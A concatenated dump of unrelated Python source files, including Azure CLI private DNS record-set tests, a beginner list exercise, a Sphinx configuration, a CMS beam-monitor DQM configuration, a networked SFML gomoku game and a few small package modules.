recordset = self._Create_RecordSet('cname', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'cname', zone['name'])
recordset = self._Create_CNAMERecord(recordset['name'], zone['name'], 'newclitestcname')
recordsetResult = self._Show_RecordSet(recordset['name'], 'cname', zone['name'])
self.assertTrue(recordsetResult.get('cnameRecord') == recordset.get('cnameRecord'))
recordset = self._Delete_CNAMERecord(recordset['name'], zone['name'], 'newclitestcname')
self._Delete_RecordSet(recordset['name'], 'cname', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_SRVRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('srv', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'srv', zone['name'])
recordset = self._Create_SRVRecord(recordset['name'], zone['name'], 'newsrv.target')
recordsetResult = self._Show_RecordSet(recordset['name'], 'srv', zone['name'])
self.assertTrue(all(record in recordsetResult.get('srvRecords') for record in recordset.get('srvRecords')))
recordset = self._Delete_SRVRecord(recordset['name'], zone['name'], 'newsrv.target')
self._Delete_RecordSet(recordset['name'], 'srv', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsByType_NoRecordSetsPresent_ExpectNoRecordSetsRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns record-set a list -g {rg} -z {zone}', checks=[
self.is_empty()
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsByType_MultipleRecordSetsPresent_ExpectMultipleRecordSetsRetrieved(self, resource_group):
zone = self._Create_PrivateZone()
recordset1 = self._Create_RecordSet('a', zone['name'])
recordset2 = self._Create_RecordSet('a', zone['name'])
recordset3 = self._Create_RecordSet('a', zone['name'])
recordset4 = self._Create_RecordSet('a', zone['name'])
createdRecordsets = [recordset1, recordset2, recordset3, recordset4]
returnedRecordsets = self.cmd('az network private-dns record-set a list -g {rg} -z {zone}', checks=[
self.check('length(@)', 4)
]).get_output_in_json()
self.assertTrue(all(recordset in createdRecordsets for recordset in returnedRecordsets))
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsAcrossType_DefaultRecordSetPresent_ExpectDefaultRecordSetRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns record-set list -g {rg} -z {zone}', checks=[
self.check('length(@)', 1),
self.exists('@[0].soaRecord'),
self.check('@[0].name', '@')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsAcrossType_MultipleRecordSetsPresent_ExpectMultipleRecordSetsRetrieved(self, resource_group):
zone = self._Create_PrivateZone()
recordset1 = self._Create_RecordSet('a', zone['name'])
recordset2 = self._Create_RecordSet('aaaa', zone['name'])
recordset3 = self._Create_RecordSet('txt', zone['name'])
recordset4 = self._Create_RecordSet('cname', zone['name'])
recordset5 = self._Create_RecordSet('srv', zone['name'])
recordset6 = self._Create_RecordSet('mx', zone['name'])
recordset7 = self._Create_RecordSet('ptr', zone['name'])
soaRecordset = self.cmd('az network private-dns record-set soa show -g {rg} -z {zone}').get_output_in_json()
createdRecordsets = [recordset1, recordset2, recordset3, recordset4, recordset5, recordset6, recordset7, soaRecordset]
returnedRecordsets = self.cmd('az network private-dns record-set list -g {rg} -z {zone}', checks=[
self.check('length(@)', 8)
]).get_output_in_json()
self.assertTrue(all(recordset in createdRecordsets for recordset in returnedRecordsets))
if __name__ == '__main__':
unittest.main()
|
py | 7dfaaf51f0aef7da9eaece3be133c36286b53b78 | #a)sort the list in both ascending and desecending order.
print("a")
cars = [32,43,42,42,56,75,23]
cars.sort()
print(cars)
cars.sort(reverse=True)
print(cars)
print("b")
#b)create a 1 dimensional list and fetch all items from the list.
plist=['sank','ram','shikha','ashu']
print(plist)
print("c")
#c) Write a program to remove duplicates from the list.
fruit_random=['Apple','Banana','Apple','Banana','Orange','Banana','Banana','Orange','Apple','Banana','Orange']
print(f"\n\nList before removing duplicates: {fruit_random}")
fruit_distinct = list(set(fruit_random))
print(f"List after removing duplicates: {fruit_distinct}")
print("d")
#d)Print below using For loop
#XXX
#XXXXXX
Pat = ["XXX", "XXXXXX"]
for X in Pat:
print(X)
print("e")
#e
list=['sank','SANK','ASHU','ashu']
list.sort()
print(list)
print("f")
#f
word=['zero','one','two','three','four','five','six','seven','eight','nine']
number= input("Enter number: ")
n=int(number[::-1])
while (n!=0):
f=int(n%10)
print(word[f], end=" ")
n=n//10
print("g")
#g
mylist=['sank','ashu','shashank','sank']
mylist.append('sssss')
print(mylist)
mylist.extend(list)
print(mylist)
mylist.pop()
print(mylist)
print("h")
#h Remove certain items from list by uing pop and remove
thislist = ["apple", "banana", "cherry"]
thislist.remove('apple')
print(thislist)
thislist.pop()
print(thislist)
print("i")
# i)Replace a particular element in the list.
my_list = ['Banana','Banana','Apple','Mango','Banana','Mango','Mango','Apple']
print(my_list)
my_list = ['Pear' if i=='Banana' else i for i in my_list]
print(my_list)
print("j")
#j)Empty out the list
mylist.clear()
print(mylist)
print("k")
#k)Delete the list
del mylist
|
py | 7dfaaf6c48c602960ef6e5d7d5b301ba94149adf | # -*- coding: utf-8 -*-
#
# EmotionX documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'EmotionX'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'emotionxdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'emotionx.tex',
u'EmotionX Documentation',
u"Andrew Nguyen", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'emotionx', u'EmotionX Documentation',
[u"Andrew Nguyen"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'emotionx', u'EmotionX Documentation',
u"Andrew Nguyen", 'EmotionX',
'Repo for EmotionX comp', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
|
py | 7dfab01fde1bca8721d6898a3c5f0c6bad050b64 | from __future__ import print_function
import FWCore.ParameterSet.Config as cms
# Define once the BeamSpotOnline record name,
# will be used both in BeamMonitor setup and in payload creation/upload
BSOnlineRecordName = 'BeamSpotOnlineHLTObjectsRcd'
BSOnlineTag = 'BeamSpotOnlineTestHLT'
BSOnlineJobName = 'BeamSpotOnlineTestHLT'
BSOnlineOmsServiceUrl = 'http://cmsoms-services.cms:9949/urn:xdaq-application:lid=100/getRunAndLumiSection'
useLockRecords = True
#from Configuration.Eras.Era_Run2_2018_cff import Run2_2018
#process = cms.Process("BeamMonitor", Run2_2018) # FIMXE
import sys
from Configuration.Eras.Era_Run2_2018_pp_on_AA_cff import Run2_2018_pp_on_AA
process = cms.Process("BeamMonitor", Run2_2018_pp_on_AA)
# Configure tag and jobName if running Playback system
if "dqm_cmssw/playback" in str(sys.argv[1]):
BSOnlineTag = BSOnlineTag + 'Playback'
BSOnlineJobName = BSOnlineJobName + 'Playback'
BSOnlineOmsServiceUrl = ''
useLockRecords = False
# Message logger
#process.load("FWCore.MessageLogger.MessageLogger_cfi")
#process.MessageLogger = cms.Service("MessageLogger",
# debugModules = cms.untracked.vstring('*'),
# cerr = cms.untracked.PSet(
# FwkReport = cms.untracked.PSet(
# optionalPSet = cms.untracked.bool(True),
# reportEvery = cms.untracked.int32(1000),
# limit = cms.untracked.int32(999999)
# )
# ),
# destinations = cms.untracked.vstring('cerr'),
#)
# switch
live = True # FIXME
unitTest = False
if 'unitTest=True' in sys.argv:
live=False
unitTest=True
useLockRecords = False
# Common part for PP and H.I Running
#-----------------------------
if unitTest:
process.load("DQM.Integration.config.unittestinputsource_cfi")
from DQM.Integration.config.unittestinputsource_cfi import options
elif live:
# for live online DQM in P5
process.load("DQM.Integration.config.inputsource_cfi")
from DQM.Integration.config.inputsource_cfi import options
# new stream label
process.source.streamLabel = cms.untracked.string('streamDQMOnlineBeamspot')
else:
process.load("DQM.Integration.config.fileinputsource_cfi")
from DQM.Integration.config.fileinputsource_cfi import options
# for testing in lxplus
#process.load("DQM.Integration.config.fileinputsource_cfi")
#from DQM.Integration.config.fileinputsource_cfi import options
#--------------------------
# HLT Filter
# 0=random, 1=physics, 2=calibration, 3=technical
#--------------------------
process.hltTriggerTypeFilter = cms.EDFilter("HLTTriggerTypeFilter",
SelectedTriggerType = cms.int32(1)
)
#-----------------------------
# DQM Live Environment
#-----------------------------
process.load("DQM.Integration.config.environment_cfi")
process.dqmEnv.subSystemFolder = 'BeamMonitor'
process.dqmSaver.tag = 'BeamMonitor'
process.dqmSaver.runNumber = options.runNumber
process.dqmSaverPB.tag = 'BeamMonitor'
process.dqmSaverPB.runNumber = options.runNumber
#-----------------------------
# BeamMonitor
#-----------------------------
process.load("DQM.BeamMonitor.BeamMonitor_cff")
#---------------
# Calibration
#---------------
# Condition for P5 cluster
process.load("DQM.Integration.config.FrontierCondition_GT_cfi")
process.GlobalTag.DBParameters.authenticationPath = cms.untracked.string('.')
# Condition for lxplus: change and possibly customise the GT
#from Configuration.AlCa.GlobalTag import GlobalTag as gtCustomise
#process.GlobalTag = gtCustomise(process.GlobalTag, 'auto:run2_data', '')
# Change Beam Monitor variables
process.dqmBeamMonitor.useLockRecords = cms.untracked.bool(useLockRecords)
if process.dqmRunConfig.type.value() is "production":
process.dqmBeamMonitor.BeamFitter.WriteAscii = True
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmpro/BeamMonitorDQM/BeamFitResults.txt'
else:
process.dqmBeamMonitor.BeamFitter.WriteAscii = False
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmdev/BeamMonitorDQM/BeamFitResults.txt'
process.dqmcommon = cms.Sequence(process.dqmEnv
* process.dqmSaver*process.dqmSaverPB)
process.monitor = cms.Sequence(process.dqmBeamMonitor)
#-----------------------------------------------------------
# process customizations included here
from DQM.Integration.config.online_customizations_cfi import *
process = customise(process)
#--------------------------
# Proton-Proton Stuff
#--------------------------
if (process.runType.getRunType() == process.runType.pp_run or
process.runType.getRunType() == process.runType.pp_run_stage1 or
process.runType.getRunType() == process.runType.cosmic_run or
process.runType.getRunType() == process.runType.cosmic_run_stage1 or
process.runType.getRunType() == process.runType.hpu_run or
process.runType.getRunType() == process.runType.hi_run):
print("[beamhlt_dqm_sourceclient-live_cfg]:: Running pp")
process.load("RecoVertex.BeamSpotProducer.BeamSpot_cfi")
process.dqmBeamMonitor.monitorName = 'BeamMonitor'
process.dqmBeamMonitor.OnlineMode = True
process.dqmBeamMonitor.recordName = BSOnlineRecordName
process.dqmBeamMonitor.resetEveryNLumi = 5
process.dqmBeamMonitor.resetPVEveryNLumi = 5
process.dqmBeamMonitor.PVFitter.minNrVerticesForFit = 20
process.dqmBeamMonitor.PVFitter.minVertexNdf = 10
# some inputs to BeamMonitor
if(process.runType.getRunType() == process.runType.hi_run):
process.dqmBeamMonitor.BeamFitter.TrackCollection = 'hltPFMuonMergingPPOnAA'
process.dqmBeamMonitor.primaryVertex = 'hltVerticesPFFilterPPOnAA'
process.dqmBeamMonitor.PVFitter.VertexCollection = 'hltVerticesPFFilterPPOnAA'
else:
process.dqmBeamMonitor.BeamFitter.TrackCollection = 'hltPFMuonMerging'
process.dqmBeamMonitor.primaryVertex = 'hltVerticesPFFilter'
process.dqmBeamMonitor.PVFitter.VertexCollection = 'hltVerticesPFFilter'
# keep checking this with new release expected close to 1
process.dqmBeamMonitor.PVFitter.errorScale = 0.95
#TriggerName for selecting pv for DIP publication, NO wildcard needed here
#it will pick all triggers which has these strings in theri name
process.dqmBeamMonitor.jetTrigger = cms.untracked.vstring(
"HLT_HT300_Beamspot", "HLT_HT300_Beamspot",
"HLT_PAZeroBias_v", "HLT_ZeroBias_", "HLT_QuadJet",
"HLT_HI")
process.dqmBeamMonitor.hltResults = "TriggerResults::HLT"
#---------
# Upload BeamSpotOnlineObject (HLTRcd) to CondDB
if unitTest == False:
process.OnlineDBOutputService = cms.Service("OnlineDBOutputService",
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(0),
authenticationPath = cms.untracked.string('.')
),
# Upload to CondDB
connect = cms.string('oracle://cms_orcon_prod/CMS_CONDITIONS'),
preLoadConnectionString = cms.untracked.string('frontier://FrontierProd/CMS_CONDITIONS'),
runNumber = cms.untracked.uint64(options.runNumber),
omsServiceUrl = cms.untracked.string(BSOnlineOmsServiceUrl),
writeTransactionDelay = cms.untracked.uint32(options.transDelay),
latency = cms.untracked.uint32(2),
autoCommit = cms.untracked.bool(True),
saveLogsOnDB = cms.untracked.bool(True),
jobName = cms.untracked.string(BSOnlineJobName), # name of the DB log record
toPut = cms.VPSet(cms.PSet(
record = cms.string(BSOnlineRecordName),
tag = cms.string(BSOnlineTag),
timetype = cms.untracked.string('Lumi'),
onlyAppendUpdatePolicy = cms.untracked.bool(True)
)),
frontierKey = cms.untracked.string(options.runUniqueKey)
)
else:
process.OnlineDBOutputService = cms.Service("OnlineDBOutputService",
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(0),
authenticationPath = cms.untracked.string('.')
),
# Upload to CondDB
connect = cms.string('sqlite_file:BeamSpotOnlineHLT.db'),
preLoadConnectionString = cms.untracked.string('sqlite_file:BeamSpotOnlineHLT.db'),
runNumber = cms.untracked.uint64(options.runNumber),
lastLumiFile = cms.untracked.string('last_lumi.txt'),
writeTransactionDelay = cms.untracked.uint32(options.transDelay),
latency = cms.untracked.uint32(2),
autoCommit = cms.untracked.bool(True),
toPut = cms.VPSet(cms.PSet(
record = cms.string(BSOnlineRecordName),
tag = cms.string(BSOnlineTag),
timetype = cms.untracked.string('Lumi'),
onlyAppendUpdatePolicy = cms.untracked.bool(True)
)),
frontierKey = cms.untracked.string(options.runUniqueKey)
)
print("Configured frontierKey", options.runUniqueKey)
process.p = cms.Path( process.hltTriggerTypeFilter
* process.dqmcommon
* process.offlineBeamSpot
* process.monitor )
|
py | 7dfab138c48f3f066f1fff248fb075f4ae3cfd1f | # -*- coding: utf-8 -*-
""" Top-level package for coal_node."""
|
py | 7dfab474517689dcee4ed7890692e18914e4e693 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .get_policy_assignment import *
from .get_policy_definition import *
from .get_policy_definition_at_management_group import *
from .get_policy_set_definition import *
from .get_policy_set_definition_at_management_group import *
from .policy_assignment import *
from .policy_definition import *
from .policy_definition_at_management_group import *
from .policy_set_definition import *
from .policy_set_definition_at_management_group import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-nextgen:authorization/v20190901:PolicyAssignment":
return PolicyAssignment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicyDefinition":
return PolicyDefinition(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicyDefinitionAtManagementGroup":
return PolicyDefinitionAtManagementGroup(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicySetDefinition":
return PolicySetDefinition(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-nextgen:authorization/v20190901:PolicySetDefinitionAtManagementGroup":
return PolicySetDefinitionAtManagementGroup(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-nextgen", "authorization/v20190901", _module_instance)
_register_module()
|
py | 7dfab4c176f1a35fdcbe7a8aec81f00323d20297 | from exh.prop import Or, And
from exh.fol import Existential, Universal
from exh.scales import SimpleScales
# Default scalar scales
scales = SimpleScales([{Or, And}, {Existential, Universal}])
# Whether Exh computes innocent inclusion by default
ii_on = False
# Whether automatic alternatives use subconstituents alternatives by default
sub = True
# Whether the prejacent of Exh is an alternative to Exh when "sub" is True ; we don't derive Free Choice if this is set to True
prejacent_alternative_to_exh = False
# The minimmal number of alternatives beyond which the "diagnose" method starts displaying them as bullet point list
cutoff_inline_to_list = 5 |
py | 7dfab4ce7ed7fe0fc6074f2a8c3fd71d550afa90 | #
# Copyright 2000-2025 riteme
#
import sys
import time
import socket
import threading
from math import *
from sfml.window import *
from sfml.graphics import *
from sfml.system import *
class Game(object):
WINDOW_WIDTH = 570
WINDOW_HEIGHT = 570
WINDOW_TITLE = "Chess"
CHESS_RADIUS = 15
POINT_RADIUS = 3
CHESS_NONE = 0
CHESS_WHITE = 1
CHESS_BLACK = 2
def __init__(self):
super(Game, self).__init__()
setting = ContextSettings()
setting.antialiasing_level = 4
self.window = RenderWindow(
mode=VideoMode(self.WINDOW_WIDTH, self.WINDOW_HEIGHT),
title=self.WINDOW_TITLE,
style=Style.TITLEBAR | Style.CLOSE,
settings=setting
)
self.window.framerate_limit = 60
self.setup_board()
self.setup_chess()
# Utility
def setup_network(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.data = None
def connect_to(self, address, port):
self.socket.connect((address, port))
def bind_to(self, address, port):
self.socket.bind((address, port))
self.socket.listen(1)
def serve(self):
# Wait for connection
connection, address = self.socket.accept()
# Wait for mouse input
self.disabled = False
while self.data is None:
time.sleep(0.01)
connection.sendall(
("place %s %s" % self.data).encode("ascii")
)
# Already won
if self.finished:
return
print("first one at %s, %s" % self.data)
while True:
# Wait for white
self.disabled = True
message = connection.recv(1024).decode("ascii")
tokens = message.strip().split(" ")
command = tokens[0].lower()
if command == "place":
x = int(tokens[1])
y = int(tokens[2])
print("get %s, %s" % (x, y))
self.place(x, y, Color.BLACK)
else:
raise RuntimeError("Unexpected command: %s" % (command))
# Already finished
if self.finished:
break
# Wait for mouse input
self.disabled = False
self.data = None
while self.data is None:
time.sleep(0.01)
print("put %s, %s" % self.data)
connection.sendall(
("place %s %s" % self.data).encode("ascii")
)
# Already won
if self.finished:
break
connection.close()
def listen(self):
self.disabled = True
while True:
# Wait for black
message = self.socket.recv(1024).decode("ascii")
tokens = message.strip().split(" ")
command = tokens[0].lower()
if command == "place":
x = int(tokens[1])
y = int(tokens[2])
print("get %s, %s" % (x, y))
self.place(x, y, Color.BLACK)
else:
raise RuntimeError("Unexpected command!")
# Already finished
if self.finished:
return
# Wait for mouse input
self.disabled = False
self.data = None
while self.data is None:
time.sleep(0.01)
self.disabled = True
print("put %s, %s" % self.data)
self.socket.sendall(
("place %s %s" % self.data).encode("ascii")
)
# Already won
if self.finished:
return
self.socket.close()
def setup_server(self):
self.server = threading.Thread(target=Game.serve, args=(self, ))
self.server.start()
def setup_client(self):
self.listener = threading.Thread(target=Game.listen, args=(self, ))
self.listener.start()
def place(self, i, j, color):
self.data = None
if self.chess[i][j].fill_color == Color.TRANSPARENT:
self.chess[i][j].fill_color = self.current_color
self.history.append((i, j))
self.last_block.position = self.to_position(i, j)
self.last_block.position -= (self.CHESS_RADIUS, self.CHESS_RADIUS)
result = self.check_winner()
if not result is None:
self.finish(result)
else:
self.change_color()
self.data = (i, j)
def setup_board(self):
self.board = VertexArray(PrimitiveType.LINES)
for i in range(0, 19):
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS,
self.CHESS_RADIUS
), Color.BLACK
)
)
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS,
self.CHESS_RADIUS + 36 * self.CHESS_RADIUS
), Color.BLACK
)
)
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS,
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS
), Color.BLACK
)
)
self.board.append(
Vertex(Vector2(
self.CHESS_RADIUS + 36 * self.CHESS_RADIUS,
self.CHESS_RADIUS + i * 2 * self.CHESS_RADIUS
), Color.BLACK
)
)
self.circles = []
POSITIONS = [
(3, 3), (3, 9), (3, 15),
(9, 3), (9, 9), (9, 15),
(15, 3), (15, 9), (15, 15)
]
for point in POSITIONS:
x, y = point
circle = CircleShape()
circle.radius = self.POINT_RADIUS
circle.fill_color = Color.BLACK
circle.position = (
self.CHESS_RADIUS * 2 * x + self.CHESS_RADIUS - self.POINT_RADIUS,
self.CHESS_RADIUS * 2 * y + self.CHESS_RADIUS - self.POINT_RADIUS
)
self.circles.append(circle)
def setup_chess(self):
self.chess = []
for i in range(0, 19):
self.chess.append([])
for j in range(0, 19):
chess = CircleShape(point_count=128)
chess.radius = self.CHESS_RADIUS
chess.fill_color = Color.TRANSPARENT
chess.position = self.to_position(i, j)
chess.position -= (self.CHESS_RADIUS, self.CHESS_RADIUS)
self.chess[-1].append(chess)
self.current_block = RectangleShape()
self.current_block.size = (2 * self.CHESS_RADIUS, 2 * self.CHESS_RADIUS)
self.current_block.position = (-100, -100)
self.current_block.fill_color = Color(200, 200, 200)
self.last_block = RectangleShape()
self.last_block.size = (2 * self.CHESS_RADIUS, 2 * self.CHESS_RADIUS)
self.last_block.position = (-100, -100)
self.last_block.fill_color = Color.TRANSPARENT
self.last_block.outline_thickness = 2
self.last_block.outline_color = Color.RED
self.current_color = Color.BLACK
self.disabled = False
self.finished = False
self.history = []
def change_color(self):
if self.current_color == Color.WHITE:
self.current_color = Color.BLACK
else:
self.current_color = Color.WHITE
def to_position(self, i, j):
return (
self.CHESS_RADIUS * 2 * i + self.CHESS_RADIUS,
self.CHESS_RADIUS * 2 * j + self.CHESS_RADIUS
)
def to_index(self, x, y):
return (
int(x / (self.CHESS_RADIUS * 2)),
int(y / (self.CHESS_RADIUS * 2))
)
def check_winner(self):
dx = [0, 1, 1, 1, 0, -1, -1, -1]
dy = [-1, -1, 0, 1, 1, 1, 0, -1]
for i in range(0, 19):
for j in range(0, 19):
for k in range(0, len(dx)):
target = self.chess[i][j].fill_color
if target == Color.TRANSPARENT:
break
cx = i + dx[k]
cy = j + dy[k]
count = 0
while count < 4 and 0 <= cx and cx <= 18 and 0 <= cy and cy <= 18:
if self.chess[cx][cy].fill_color == target:
count += 1;
cx += dx[k]
cy += dy[k]
else:
break
if count == 4:
return (i, j, cx - dx[k], cy - dy[k], target)
return None
def finish(self, result):
self.disabled = True
self.finished = True
x1, y1, x2, y2, color = result
x1, y1 = self.to_position(x1, y1)
x2, y2 = self.to_position(x2, y2)
self.line = VertexArray(PrimitiveType.LINES, 2)
self.line[0] = Vertex(
Vector2(x1, y1), Color.RED
)
self.line[1] = Vertex(
Vector2(x2, y2), Color.RED
)
self.info = Text()
self.info.position = (0, 0)
self.info.character_size = 30
self.info.font = Font.from_file("ubuntu.ttf")
if color == Color.WHITE:
self.info.string = "White win!"
self.info.color = Color.WHITE
else:
self.info.string = "Black win!"
self.info.color = Color.BLACK
# Events
def do_events(self):
for event in self.window.events:
if type(event) is CloseEvent:
self.window.close()
elif type(event) is MouseButtonEvent:
if self.disabled or event.pressed:
continue
elif event.button == Mouse.LEFT:
mx, my = event.position
i, j = self.to_index(mx, my)
self.place(i, j, self.current_color)
elif type(event) is MouseMoveEvent:
mx, my = event.position
i, j = self.to_index(mx, my)
self.current_block.position = self.to_position(i, j)
self.current_block.position -= (self.CHESS_RADIUS, self.CHESS_RADIUS)
# elif type(event) is KeyEvent:
# if not event.released:
# continue
# if event.code == window.Keyboard.ESCAPE:
# self.setup_chess()
# elif event.code == window.Keyboard.Z and event.control:
# if len(self.history) > 0:
# i, j = self.history.pop()
# self.chess[i][j].fill_color = Color.TRANSPARENT
# Updating
def update(self):
pass
# Rendering
def draw_board(self):
self.window.draw(self.board)
for circle in self.circles:
self.window.draw(circle)
def draw_chess(self):
for line in self.chess:
for chess in line:
self.window.draw(chess)
def render(self):
self.window.clear(Color(205, 154, 61))
self.window.draw(self.current_block)
self.draw_board()
self.draw_chess()
self.window.draw(self.last_block)
if self.finished:
self.window.draw(self.line)
self.window.draw(self.info)
self.window.display()
def run(self):
while self.window.is_open:
self.do_events()
self.update()
self.render()
if __name__ == "__main__":
game = Game()
if len(sys.argv) > 1:
command = sys.argv[1]
address = sys.argv[2]
port = int(sys.argv[3])
game.setup_network()
if command == "create":
game.bind_to(address, port)
game.setup_server()
elif command == "join":
game.connect_to(address, port)
game.setup_client()
else:
print("(error) Unknown command: {}".format(command))
game.run()
|
py | 7dfab4e4ed427a224348d58d7418a339ae57032d | from textwrap import dedent
from nose.tools import eq_
from douglas.plugins import rst_parser
from douglas.tests import PluginTest
class TagsTest(PluginTest):
def setUp(self):
PluginTest.setUp(self, rst_parser)
def test_parsing(self):
fn = self.create_file('entries/blogpost.rst', dedent("""\
The Title
#meta1 val1
This is my blog post
====================
**so amazing**
"""))
ret = rst_parser.parse_rst_file(fn, self.request)
